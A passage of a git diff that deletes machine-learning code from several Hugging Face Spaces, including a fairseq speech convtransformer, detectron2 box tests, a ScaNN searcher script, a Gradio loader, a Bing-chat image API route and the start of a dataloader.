- self.padding_idx = 1
- self.in_channels = 1
- self.input_dim = args.input_feat_per_channel
- self.conv = torch.nn.Sequential(
- torch.nn.Conv2d(1, args.conv_out_channels, 3, stride=2, padding=3 // 2),
- torch.nn.ReLU(),
- torch.nn.Conv2d(
- args.conv_out_channels,
- args.conv_out_channels,
- 3,
- stride=2,
- padding=3 // 2,
- ),
- torch.nn.ReLU(),
- )
- transformer_input_dim = self.infer_conv_output_dim(
- self.in_channels, self.input_dim, args.conv_out_channels
- )
- self.out = torch.nn.Linear(transformer_input_dim, args.encoder_embed_dim)
- self.embed_positions = PositionalEmbedding(
- args.max_source_positions,
- args.encoder_embed_dim,
- self.padding_idx,
- learned=False,
- )
-
- self.transformer_layers = nn.ModuleList([])
- self.transformer_layers.extend(
- [TransformerEncoderLayer(args) for i in range(args.encoder_layers)]
- )
- if args.encoder_normalize_before:
- self.layer_norm = LayerNorm(args.encoder_embed_dim)
- else:
- self.layer_norm = None
-
- def pooling_ratio(self):
- return 4
-
- def infer_conv_output_dim(self, in_channels, input_dim, out_channels):
- sample_seq_len = 200
- sample_bsz = 10
- x = torch.randn(sample_bsz, in_channels, sample_seq_len, input_dim)
- x = torch.nn.Conv2d(1, out_channels, 3, stride=2, padding=3 // 2)(x)
- x = torch.nn.Conv2d(out_channels, out_channels, 3, stride=2, padding=3 // 2)(x)
- x = x.transpose(1, 2)
- mb, seq = x.size()[:2]
- return x.contiguous().view(mb, seq, -1).size(-1)
-
- def forward(self, src_tokens, src_lengths):
- """Encode input sequence.
- :param torch.Tensor xs: input tensor
- :param torch.Tensor masks: input mask
- :return: position embedded tensor and mask
- :rtype Tuple[torch.Tensor, torch.Tensor]:
- """
- bsz, max_seq_len, _ = src_tokens.size()
- x = (
- src_tokens.view(bsz, max_seq_len, self.in_channels, self.input_dim)
- .transpose(1, 2)
- .contiguous()
- )
- x = self.conv(x)
- bsz, _, output_seq_len, _ = x.size()
- x = x.transpose(1, 2).transpose(0, 1).contiguous().view(output_seq_len, bsz, -1)
- x = self.out(x)
- x = self.embed_scale * x
-
- subsampling_factor = int(max_seq_len * 1.0 / output_seq_len + 0.5)
- input_len_0 = (src_lengths.float() / subsampling_factor).ceil().long()
- input_len_1 = x.size(0) * torch.ones([src_lengths.size(0)]).long().to(
- input_len_0.device
- )
- input_lengths = torch.min(input_len_0, input_len_1)
-
- encoder_padding_mask = lengths_to_padding_mask(input_lengths)
-
- positions = self.embed_positions(encoder_padding_mask).transpose(0, 1)
- x += positions
- x = F.dropout(x, p=self.dropout, training=self.training)
-
- for layer in self.transformer_layers:
- x = layer(x, encoder_padding_mask)
-
- if not encoder_padding_mask.any():
- maybe_encoder_padding_mask = None
- else:
- maybe_encoder_padding_mask = encoder_padding_mask
-
- return {
- "encoder_out": [x],
- "encoder_padding_mask": [maybe_encoder_padding_mask]
- if maybe_encoder_padding_mask is not None
- else [],
- "encoder_embedding": [],
- "encoder_states": [],
- "src_tokens": [],
- "src_lengths": [],
- }
-
- @torch.jit.export
- def reorder_encoder_out(self, encoder_out: Dict[str, List[Tensor]], new_order):
- """
- Reorder encoder output according to *new_order*.
-
- Args:
- encoder_out: output from the ``forward()`` method
- new_order (LongTensor): desired order
-
- Returns:
- *encoder_out* rearranged according to *new_order*
- """
- new_encoder_out = [encoder_out["encoder_out"][0].index_select(1, new_order)]
- if len(encoder_out["encoder_padding_mask"]) == 0:
- new_encoder_padding_mask = []
- else:
- new_encoder_padding_mask = [
- (encoder_out["encoder_padding_mask"][0]).index_select(0, new_order)
- ]
- if len(encoder_out["encoder_embedding"]) == 0:
- new_encoder_embedding = []
- else:
- new_encoder_embedding = [
- (encoder_out["encoder_embedding"][0]).index_select(0, new_order)
- ]
- encoder_states = encoder_out["encoder_states"]
- if len(encoder_states) > 0:
- for idx, state in enumerate(encoder_states):
- encoder_states[idx] = state.index_select(1, new_order)
-
- return {
- "encoder_out": new_encoder_out,
- "encoder_padding_mask": new_encoder_padding_mask,
- "encoder_embedding": new_encoder_embedding,
- "encoder_states": encoder_states,
- "src_tokens": [],
- "src_lengths": [],
- }
-
-
-class TransformerDecoderNoExtra(TransformerDecoder):
- def extract_features(
- self,
- prev_output_tokens,
- encoder_out: Optional[Dict[str, List[Tensor]]],
- incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
- full_context_alignment: bool = False,
- alignment_layer: Optional[int] = None,
- alignment_heads: Optional[int] = None,
- ):
- # call scriptable method from parent class
- x, _ = self.extract_features_scriptable(
- prev_output_tokens,
- encoder_out,
- incremental_state,
- full_context_alignment,
- alignment_layer,
- alignment_heads,
- )
- return x, None
-
-
-@register_model_architecture(model_name="convtransformer", arch_name="convtransformer")
-def base_architecture(args):
- args.input_feat_per_channel = getattr(args, "input_feat_per_channel", 80)
- args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512)
- args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 2048)
- args.encoder_layers = getattr(args, "encoder_layers", 6)
- args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8)
- args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False)
- args.decoder_embed_dim = getattr(args, "decoder_embed_dim", args.encoder_embed_dim)
- args.decoder_ffn_embed_dim = getattr(
- args, "decoder_ffn_embed_dim", args.encoder_ffn_embed_dim
- )
- args.decoder_layers = getattr(args, "decoder_layers", 6)
- args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 8)
- args.decoder_normalize_before = getattr(args, "decoder_normalize_before", False)
- args.decoder_learned_pos = getattr(args, "decoder_learned_pos", False)
- args.attention_dropout = getattr(args, "attention_dropout", 0.0)
- args.activation_dropout = getattr(args, "activation_dropout", 0.0)
- args.activation_fn = getattr(args, "activation_fn", "relu")
- args.dropout = getattr(args, "dropout", 0.1)
- args.adaptive_softmax_cutoff = getattr(args, "adaptive_softmax_cutoff", None)
- args.adaptive_softmax_dropout = getattr(args, "adaptive_softmax_dropout", 0)
- args.share_decoder_input_output_embed = getattr(
- args, "share_decoder_input_output_embed", False
- )
- args.no_token_positional_embeddings = getattr(
- args, "no_token_positional_embeddings", False
- )
- args.adaptive_input = getattr(args, "adaptive_input", False)
- args.decoder_layerdrop = getattr(args, "decoder_layerdrop", 0.0)
-
- args.decoder_output_dim = getattr(
- args, "decoder_output_dim", args.decoder_embed_dim
- )
- args.decoder_input_dim = getattr(args, "decoder_input_dim", args.decoder_embed_dim)
- args.no_scale_embedding = getattr(args, "no_scale_embedding", False)
- args.quant_noise_pq = getattr(args, "quant_noise_pq", 0)
- args.max_source_positions = getattr(args, "max_source_positions", 3000)
- args.max_target_positions = getattr(args, "max_target_positions", 1024)
- args.tie_adaptive_weights = getattr(args, "tie_adaptive_weights", False)
- args.conv_out_channels = getattr(args, "conv_out_channels", args.encoder_embed_dim)
-
-
-@register_model_architecture("convtransformer", "convtransformer_espnet")
-def convtransformer_espnet(args):
- args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 256)
- args.encoder_layers = getattr(args, "encoder_layers", 12)
- args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4)
- args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4)
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py
deleted file mode 100644
index f869c4b2f8fb15f96a292e39bd293df7898a4fce..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/modules/transformer_sentence_encoder_layer.py
+++ /dev/null
@@ -1,139 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from typing import Callable, Optional
-
-import torch
-import torch.nn as nn
-from fairseq import utils
-from fairseq.modules import LayerNorm, MultiheadAttention
-from fairseq.modules.fairseq_dropout import FairseqDropout
-from fairseq.modules.quant_noise import quant_noise
-
-
-class TransformerSentenceEncoderLayer(nn.Module):
- """
- Implements a Transformer Encoder Layer used in BERT/XLM style pre-trained
- models.
- """
-
- def __init__(
- self,
- embedding_dim: int = 768,
- ffn_embedding_dim: int = 3072,
- num_attention_heads: int = 8,
- dropout: float = 0.1,
- attention_dropout: float = 0.1,
- activation_dropout: float = 0.1,
- activation_fn: str = "relu",
- export: bool = False,
- q_noise: float = 0.0,
- qn_block_size: int = 8,
- init_fn: Callable = None,
- ) -> None:
- super().__init__()
-
- if init_fn is not None:
- init_fn()
-
- # Initialize parameters
- self.embedding_dim = embedding_dim
- self.num_attention_heads = num_attention_heads
- self.attention_dropout = attention_dropout
- self.q_noise = q_noise
- self.qn_block_size = qn_block_size
-
- self.dropout_module = FairseqDropout(
- dropout, module_name=self.__class__.__name__
- )
- self.activation_dropout_module = FairseqDropout(
- activation_dropout, module_name=self.__class__.__name__
- )
-
- # Initialize blocks
- self.activation_fn = utils.get_activation_fn(activation_fn)
- self.self_attn = self.build_self_attention(
- self.embedding_dim,
- num_attention_heads,
- dropout=attention_dropout,
- self_attention=True,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- # layer norm associated with the self attention layer
- self.self_attn_layer_norm = LayerNorm(self.embedding_dim, export=export)
-
- self.fc1 = self.build_fc1(
- self.embedding_dim,
- ffn_embedding_dim,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
- self.fc2 = self.build_fc2(
- ffn_embedding_dim,
- self.embedding_dim,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- # layer norm associated with the position wise feed-forward NN
- self.final_layer_norm = LayerNorm(self.embedding_dim, export=export)
-
- def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
- return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
-
- def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
- return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
-
- def build_self_attention(
- self,
- embed_dim,
- num_attention_heads,
- dropout,
- self_attention,
- q_noise,
- qn_block_size,
- ):
- return MultiheadAttention(
- embed_dim,
- num_attention_heads,
- dropout=dropout,
- self_attention=True,
- q_noise=q_noise,
- qn_block_size=qn_block_size,
- )
-
- def forward(
- self,
- x: torch.Tensor,
- self_attn_mask: Optional[torch.Tensor] = None,
- self_attn_padding_mask: Optional[torch.Tensor] = None,
- ):
- """
- LayerNorm is applied either before or after the self-attention/ffn
- modules similar to the original Transformer implementation.
- """
- residual = x
- x, attn = self.self_attn(
- query=x,
- key=x,
- value=x,
- key_padding_mask=self_attn_padding_mask,
- need_weights=False,
- attn_mask=self_attn_mask,
- )
- x = self.dropout_module(x)
- x = residual + x
- x = self.self_attn_layer_norm(x)
-
- residual = x
- x = self.activation_fn(self.fc1(x))
- x = self.activation_dropout_module(x)
- x = self.fc2(x)
- x = self.dropout_module(x)
- x = residual + x
- x = self.final_layer_norm(x)
- return x, attn
diff --git a/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py b/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py
deleted file mode 100644
index 2b7a0e1fa266ee2589462ccd4648d5afa5613377..0000000000000000000000000000000000000000
--- a/spaces/Oddity/ehartford-WizardLM-13B-Uncensored/app.py
+++ /dev/null
@@ -1,3 +0,0 @@
-import gradio as gr
-
-gr.Interface.load("models/ehartford/WizardLM-13B-Uncensored").launch()
\ No newline at end of file
diff --git a/spaces/Olga19821109/falcon180b/README.md b/spaces/Olga19821109/falcon180b/README.md
deleted file mode 100644
index 04189396d29fcc4721c66850250efc7c85a18276..0000000000000000000000000000000000000000
--- a/spaces/Olga19821109/falcon180b/README.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-title: Falcon-180B Demo
-emoji: 💬
-colorFrom: indigo
-colorTo: purple
-sdk: gradio
-sdk_version: 3.42.0
-app_file: app.py
-duplicated_from: tiiuae/falcon-180b-demo
----
diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py
deleted file mode 100644
index 101191818c511cf90c3c8f2cbc55aa49295697fa..0000000000000000000000000000000000000000
--- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/tests/structures/test_boxes.py
+++ /dev/null
@@ -1,223 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-import json
-import math
-import numpy as np
-import unittest
-import torch
-
-from detectron2.structures import Boxes, BoxMode, pairwise_ioa, pairwise_iou
-from detectron2.utils.testing import reload_script_model
-
-
-class TestBoxMode(unittest.TestCase):
- def _convert_xy_to_wh(self, x):
- return BoxMode.convert(x, BoxMode.XYXY_ABS, BoxMode.XYWH_ABS)
-
- def _convert_xywha_to_xyxy(self, x):
- return BoxMode.convert(x, BoxMode.XYWHA_ABS, BoxMode.XYXY_ABS)
-
- def _convert_xywh_to_xywha(self, x):
- return BoxMode.convert(x, BoxMode.XYWH_ABS, BoxMode.XYWHA_ABS)
-
- def test_convert_int_mode(self):
- BoxMode.convert([1, 2, 3, 4], 0, 1)
-
- def test_box_convert_list(self):
- for tp in [list, tuple]:
- box = tp([5.0, 5.0, 10.0, 10.0])
- output = self._convert_xy_to_wh(box)
- self.assertIsInstance(output, tp)
- self.assertIsInstance(output[0], float)
- self.assertEqual(output, tp([5.0, 5.0, 5.0, 5.0]))
-
- with self.assertRaises(Exception):
- self._convert_xy_to_wh([box])
-
- def test_box_convert_array(self):
- box = np.asarray([[5, 5, 10, 10], [1, 1, 2, 3]])
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- def test_box_convert_cpu_tensor(self):
- box = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]])
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- output = output.numpy()
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- @unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
- def test_box_convert_cuda_tensor(self):
- box = torch.tensor([[5, 5, 10, 10], [1, 1, 2, 3]]).cuda()
- output = self._convert_xy_to_wh(box)
- self.assertEqual(output.dtype, box.dtype)
- self.assertEqual(output.shape, box.shape)
- self.assertEqual(output.device, box.device)
- output = output.cpu().numpy()
- self.assertTrue((output[0] == [5, 5, 5, 5]).all())
- self.assertTrue((output[1] == [1, 1, 1, 2]).all())
-
- def test_box_convert_xywha_to_xyxy_list(self):
- for tp in [list, tuple]:
- box = tp([50, 50, 30, 20, 0])
- output = self._convert_xywha_to_xyxy(box)
- self.assertIsInstance(output, tp)
- self.assertEqual(output, tp([35, 40, 65, 60]))
-
- with self.assertRaises(Exception):
- self._convert_xywha_to_xyxy([box])
-
- def test_box_convert_xywha_to_xyxy_array(self):
- for dtype in [np.float64, np.float32]:
- box = np.asarray(
- [
- [50, 50, 30, 20, 0],
- [50, 50, 30, 20, 90],
- [1, 1, math.sqrt(2), math.sqrt(2), -45],
- ],
- dtype=dtype,
- )
- output = self._convert_xywha_to_xyxy(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = np.asarray([[35, 40, 65, 60], [40, 35, 60, 65], [0, 0, 2, 2]], dtype=dtype)
- self.assertTrue(np.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywha_to_xyxy_tensor(self):
- for dtype in [torch.float32, torch.float64]:
- box = torch.tensor(
- [
- [50, 50, 30, 20, 0],
- [50, 50, 30, 20, 90],
- [1, 1, math.sqrt(2), math.sqrt(2), -45],
- ],
- dtype=dtype,
- )
- output = self._convert_xywha_to_xyxy(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = torch.tensor([[35, 40, 65, 60], [40, 35, 60, 65], [0, 0, 2, 2]], dtype=dtype)
-
- self.assertTrue(torch.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywh_to_xywha_list(self):
- for tp in [list, tuple]:
- box = tp([50, 50, 30, 20])
- output = self._convert_xywh_to_xywha(box)
- self.assertIsInstance(output, tp)
- self.assertEqual(output, tp([65, 60, 30, 20, 0]))
-
- with self.assertRaises(Exception):
- self._convert_xywh_to_xywha([box])
-
- def test_box_convert_xywh_to_xywha_array(self):
- for dtype in [np.float64, np.float32]:
- box = np.asarray([[30, 40, 70, 60], [30, 40, 60, 70], [-1, -1, 2, 2]], dtype=dtype)
- output = self._convert_xywh_to_xywha(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = np.asarray(
- [[65, 70, 70, 60, 0], [60, 75, 60, 70, 0], [0, 0, 2, 2, 0]], dtype=dtype
- )
- self.assertTrue(np.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_box_convert_xywh_to_xywha_tensor(self):
- for dtype in [torch.float32, torch.float64]:
- box = torch.tensor([[30, 40, 70, 60], [30, 40, 60, 70], [-1, -1, 2, 2]], dtype=dtype)
- output = self._convert_xywh_to_xywha(box)
- self.assertEqual(output.dtype, box.dtype)
- expected = torch.tensor(
- [[65, 70, 70, 60, 0], [60, 75, 60, 70, 0], [0, 0, 2, 2, 0]], dtype=dtype
- )
-
- self.assertTrue(torch.allclose(output, expected, atol=1e-6), "output={}".format(output))
-
- def test_json_serializable(self):
- payload = {"box_mode": BoxMode.XYWH_REL}
- try:
- json.dumps(payload)
- except Exception:
- self.fail("JSON serialization failed")
-
- def test_json_deserializable(self):
- payload = '{"box_mode": 2}'
- obj = json.loads(payload)
- try:
- obj["box_mode"] = BoxMode(obj["box_mode"])
- except Exception:
- self.fail("JSON deserialization failed")
-
-
-class TestBoxIOU(unittest.TestCase):
- def create_boxes(self):
- boxes1 = torch.tensor([[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]])
-
- boxes2 = torch.tensor(
- [
- [0.0, 0.0, 1.0, 1.0],
- [0.0, 0.0, 0.5, 1.0],
- [0.0, 0.0, 1.0, 0.5],
- [0.0, 0.0, 0.5, 0.5],
- [0.5, 0.5, 1.0, 1.0],
- [0.5, 0.5, 1.5, 1.5],
- ]
- )
- return boxes1, boxes2
-
- def test_pairwise_iou(self):
- boxes1, boxes2 = self.create_boxes()
- expected_ious = torch.tensor(
- [
- [1.0, 0.5, 0.5, 0.25, 0.25, 0.25 / (2 - 0.25)],
- [1.0, 0.5, 0.5, 0.25, 0.25, 0.25 / (2 - 0.25)],
- ]
- )
-
- ious = pairwise_iou(Boxes(boxes1), Boxes(boxes2))
- self.assertTrue(torch.allclose(ious, expected_ious))
-
- def test_pairwise_ioa(self):
- boxes1, boxes2 = self.create_boxes()
- expected_ioas = torch.tensor(
- [[1.0, 1.0, 1.0, 1.0, 1.0, 0.25], [1.0, 1.0, 1.0, 1.0, 1.0, 0.25]]
- )
- ioas = pairwise_ioa(Boxes(boxes1), Boxes(boxes2))
- self.assertTrue(torch.allclose(ioas, expected_ioas))
-
-
-class TestBoxes(unittest.TestCase):
- def test_empty_cat(self):
- x = Boxes.cat([])
- self.assertTrue(x.tensor.shape, (0, 4))
-
- def test_to(self):
- x = Boxes(torch.rand(3, 4))
- self.assertEqual(x.to(device="cpu").tensor.device.type, "cpu")
-
- def test_scriptability(self):
- def func(x):
- boxes = Boxes(x)
- test = boxes.to(torch.device("cpu")).tensor
- return boxes.area(), test
-
- f = torch.jit.script(func)
- f = reload_script_model(f)
- f(torch.rand((3, 4)))
-
- data = torch.rand((3, 4))
-
- def func_cat(x: torch.Tensor):
- boxes1 = Boxes(x)
- boxes2 = Boxes(x)
- # boxes3 = Boxes.cat([boxes1, boxes2]) # this is not supported by torchsript for now.
- boxes3 = boxes1.cat([boxes1, boxes2])
- return boxes3
-
- f = torch.jit.script(func_cat)
- script_box = f(data)
- self.assertTrue(torch.equal(torch.cat([data, data]), script_box.tensor))
-
-
-if __name__ == "__main__":
- unittest.main()
diff --git a/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py b/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py
deleted file mode 100644
index 1e7904889c0145f9fb740fd4ae8e45c08728b255..0000000000000000000000000000000000000000
--- a/spaces/PSLD/PSLD/stable-diffusion/scripts/train_searcher.py
+++ /dev/null
@@ -1,147 +0,0 @@
-import os, sys
-import numpy as np
-import scann
-import argparse
-import glob
-from multiprocessing import cpu_count
-from tqdm import tqdm
-
-from ldm.util import parallel_data_prefetch
-
-
-def search_bruteforce(searcher):
- return searcher.score_brute_force().build()
-
-
-def search_partioned_ah(searcher, dims_per_block, aiq_threshold, reorder_k,
- partioning_trainsize, num_leaves, num_leaves_to_search):
- return searcher.tree(num_leaves=num_leaves,
- num_leaves_to_search=num_leaves_to_search,
- training_sample_size=partioning_trainsize). \
- score_ah(dims_per_block, anisotropic_quantization_threshold=aiq_threshold).reorder(reorder_k).build()
-
-
-def search_ah(searcher, dims_per_block, aiq_threshold, reorder_k):
- return searcher.score_ah(dims_per_block, anisotropic_quantization_threshold=aiq_threshold).reorder(
- reorder_k).build()
-
-def load_datapool(dpath):
-
-
- def load_single_file(saved_embeddings):
- compressed = np.load(saved_embeddings)
- database = {key: compressed[key] for key in compressed.files}
- return database
-
- def load_multi_files(data_archive):
- database = {key: [] for key in data_archive[0].files}
- for d in tqdm(data_archive, desc=f'Loading datapool from {len(data_archive)} individual files.'):
- for key in d.files:
- database[key].append(d[key])
-
- return database
-
- print(f'Load saved patch embedding from "{dpath}"')
- file_content = glob.glob(os.path.join(dpath, '*.npz'))
-
- if len(file_content) == 1:
- data_pool = load_single_file(file_content[0])
- elif len(file_content) > 1:
- data = [np.load(f) for f in file_content]
- prefetched_data = parallel_data_prefetch(load_multi_files, data,
- n_proc=min(len(data), cpu_count()), target_data_type='dict')
-
- data_pool = {key: np.concatenate([od[key] for od in prefetched_data], axis=1)[0] for key in prefetched_data[0].keys()}
- else:
- raise ValueError(f'No npz-files in specified path "{dpath}" is this directory existing?')
-
- print(f'Finished loading of retrieval database of length {data_pool["embedding"].shape[0]}.')
- return data_pool
-
-
-def train_searcher(opt,
- metric='dot_product',
- partioning_trainsize=None,
- reorder_k=None,
- # todo tune
- aiq_thld=0.2,
- dims_per_block=2,
- num_leaves=None,
- num_leaves_to_search=None,):
-
- data_pool = load_datapool(opt.database)
- k = opt.knn
-
- if not reorder_k:
- reorder_k = 2 * k
-
- # normalize
- # embeddings =
- searcher = scann.scann_ops_pybind.builder(data_pool['embedding'] / np.linalg.norm(data_pool['embedding'], axis=1)[:, np.newaxis], k, metric)
- pool_size = data_pool['embedding'].shape[0]
-
- print(*(['#'] * 100))
- print('Initializing scaNN searcher with the following values:')
- print(f'k: {k}')
- print(f'metric: {metric}')
- print(f'reorder_k: {reorder_k}')
- print(f'anisotropic_quantization_threshold: {aiq_thld}')
- print(f'dims_per_block: {dims_per_block}')
- print(*(['#'] * 100))
- print('Start training searcher....')
- print(f'N samples in pool is {pool_size}')
-
- # this reflects the recommended design choices proposed at
- # https://github.com/google-research/google-research/blob/aca5f2e44e301af172590bb8e65711f0c9ee0cfd/scann/docs/algorithms.md
- if pool_size < 2e4:
- print('Using brute force search.')
- searcher = search_bruteforce(searcher)
- elif 2e4 <= pool_size and pool_size < 1e5:
- print('Using asymmetric hashing search and reordering.')
- searcher = search_ah(searcher, dims_per_block, aiq_thld, reorder_k)
- else:
- print('Using using partioning, asymmetric hashing search and reordering.')
-
- if not partioning_trainsize:
- partioning_trainsize = data_pool['embedding'].shape[0] // 10
- if not num_leaves:
- num_leaves = int(np.sqrt(pool_size))
-
- if not num_leaves_to_search:
- num_leaves_to_search = max(num_leaves // 20, 1)
-
- print('Partitioning params:')
- print(f'num_leaves: {num_leaves}')
- print(f'num_leaves_to_search: {num_leaves_to_search}')
- # self.searcher = self.search_ah(searcher, dims_per_block, aiq_thld, reorder_k)
- searcher = search_partioned_ah(searcher, dims_per_block, aiq_thld, reorder_k,
- partioning_trainsize, num_leaves, num_leaves_to_search)
-
- print('Finish training searcher')
- searcher_savedir = opt.target_path
- os.makedirs(searcher_savedir, exist_ok=True)
- searcher.serialize(searcher_savedir)
- print(f'Saved trained searcher under "{searcher_savedir}"')
-
-if __name__ == '__main__':
- sys.path.append(os.getcwd())
- parser = argparse.ArgumentParser()
- parser.add_argument('--database',
- '-d',
- default='data/rdm/retrieval_databases/openimages',
- type=str,
- help='path to folder containing the clip feature of the database')
- parser.add_argument('--target_path',
- '-t',
- default='data/rdm/searchers/openimages',
- type=str,
- help='path to the target folder where the searcher shall be stored.')
- parser.add_argument('--knn',
- '-k',
- default=20,
- type=int,
- help='number of nearest neighbors, for which the searcher shall be optimized')
-
- opt, _ = parser.parse_known_args()
-
- train_searcher(opt,)
\ No newline at end of file
diff --git a/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts b/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts
deleted file mode 100644
index 26fdb31076a9c71e70d1725a630844b27f5a3221..0000000000000000000000000000000000000000
--- a/spaces/Pengyey/bingo-chuchu/src/pages/api/image.ts
+++ /dev/null
@@ -1,38 +0,0 @@
-'use server'
-
-import { NextApiRequest, NextApiResponse } from 'next'
-import { debug } from '@/lib/isomorphic'
-import { createHeaders } from '@/lib/utils'
-import { createImage } from '@/lib/bots/bing/utils'
-
-export default async function handler(req: NextApiRequest, res: NextApiResponse) {
- const { prompt, id } = req.query
- if (!prompt) {
- return res.json({
- result: {
- value: 'Image',
- message: 'No Prompt'
- }
- })
- }
- try {
- const headers = createHeaders(req.cookies, 'image')
-
- debug('headers', headers)
- const response = await createImage(String(prompt), String(id), {
- ...headers,
- 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32',
- })
- res.writeHead(200, {
- 'Content-Type': 'text/plain; charset=UTF-8',
- })
- return res.end(response)
- } catch (e) {
- return res.json({
- result: {
- value: 'Error',
- message: `${e}`
- }
- })
- }
-}
diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py
deleted file mode 100644
index aa24d91972837b8756b225f4879bac20436eb72a..0000000000000000000000000000000000000000
--- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/fileio/handlers/__init__.py
+++ /dev/null
@@ -1,7 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-from .base import BaseFileHandler
-from .json_handler import JsonHandler
-from .pickle_handler import PickleHandler
-from .yaml_handler import YamlHandler
-
-__all__ = ['BaseFileHandler', 'JsonHandler', 'PickleHandler', 'YamlHandler']
diff --git a/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py b/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py
deleted file mode 100644
index 99e632ec598c7951b2807ac3d68664fdef693e0a..0000000000000000000000000000000000000000
--- a/spaces/Pinwheel/GLIP-BLIP-Object-Detection-VQA/maskrcnn_benchmark/modeling/backbone/mixer.py
+++ /dev/null
@@ -1,23 +0,0 @@
-import torch
-from torch import nn
-
-class MixedOperationRandom(nn.Module):
- def __init__(self, search_ops):
- super(MixedOperationRandom, self).__init__()
- self.ops = nn.ModuleList(search_ops)
- self.num_ops = len(search_ops)
-
- def forward(self, x, x_path=None):
- if x_path is None:
- output = sum(op(x) for op in self.ops) / self.num_ops
- else:
- assert isinstance(x_path, (int, float)) and 0 <= x_path < self.num_ops or isinstance(x_path, torch.Tensor)
- if isinstance(x_path, (int, float)):
- x_path = int(x_path)
- assert 0 <= x_path < self.num_ops
- output = self.ops[x_path](x)
- elif isinstance(x_path, torch.Tensor):
- assert x_path.size(0) == x.size(0), 'batch_size should match length of y_idx'
- output = torch.cat([self.ops[int(x_path[i].item())](x.narrow(0, i, 1))
- for i in range(x.size(0))], dim=0)
- return output
\ No newline at end of file
diff --git a/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py b/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py
deleted file mode 100644
index 4ee569224466ae6655b13a58b11804d25165cfaf..0000000000000000000000000000000000000000
--- a/spaces/Pranjal2041/SemSup-XC/cleaned_code/src/dataloaders.py
+++ /dev/null
@@ -1,394 +0,0 @@
-from typing import Dict, Optional
-import numpy as np
-import torch
-import itertools
-import torch
-from torch.utils.data import Dataset
-import json
-import random
-from collections.abc import Mapping
-from typing import Dict, Optional, List, Any, NewType
-import pandas as pd
-from torch.utils.data import DataLoader
-from os.path import join
-import os
-import gensim.downloader
-import h5py
-import time
-from tqdm import tqdm
-
-def getTokenizedLabelDescriptions(data_args, desc_file, tokenizer):
- padding = "max_length" if data_args.pad_to_max_length else False
- max_seq_length = min(data_args.label_max_seq_length, tokenizer.model_max_length)
-
- label_descs = json.load(open(desc_file, encoding = 'utf-8'))
-
- return {label_key: [
- tokenizer(
- desc,
- truncation=True,
- padding=padding,
- max_length=max_seq_length,
- return_tensors='pt'
- )
- for desc in descs[1]] for label_key, descs in label_descs.items()}
-
-
-class SemSupDataset(Dataset):
-
